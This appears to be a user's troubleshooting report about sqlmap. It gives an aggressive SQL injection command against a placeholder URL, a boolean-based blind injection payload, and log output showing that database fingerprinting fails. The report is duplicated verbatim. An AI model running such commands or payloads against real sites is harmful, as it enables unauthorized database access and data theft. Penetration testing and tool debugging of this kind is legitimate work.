sqlmap command: sqlmap.py -u "https://www.example.com/search/?vuln=1" --random-agent --keep-alive --level=5 --risk=3 --dbms="DB2" --technique="B" -v 2 --tamper=overlongutf8 --all --charset="iso-8859-1" --encoding="windows=1252" --fresh-queries
sqlmap resumed the following injection point(s) from stored session:
Parameter: filter (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: vuln=1%' AND 9266=9266 AND '%'='
Vector: AND [INFERENCE]
[00:40:13] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:40:13] [INFO] testing IBM DB2
[00:40:13] [DEBUG] resuming configuration option 'code' (403)
[00:40:15] [WARNING] reflective value(s) found and filtering out
[00:40:15] [WARNING] the back-end DBMS is not IBM DB2
[00:40:15] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
I got these everytime I ran "--fresh-queries"
Thanks.
sqlmap command: sqlmap.py -u "https://www.example.com/search/?vuln=1" --random-agent --keep-alive --level=5 --risk=3 --dbms="DB2" --technique="B" -v 2 --tamper=overlongutf8 --all --charset="iso-8859-1" --encoding="windows=1252" --fresh-queries
sqlmap resumed the following injection point(s) from stored session:
Parameter: filter (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: vuln=1%' AND 9266=9266 AND '%'='
Vector: AND [INFERENCE]
[00:40:13] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:40:13] [INFO] testing IBM DB2
[00:40:13] [DEBUG] resuming configuration option 'code' (403)
[00:40:15] [WARNING] reflective value(s) found and filtering out
[00:40:15] [WARNING] the back-end DBMS is not IBM DB2
[00:40:15] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
I got these everytime I ran "--fresh-queries"
Thanks.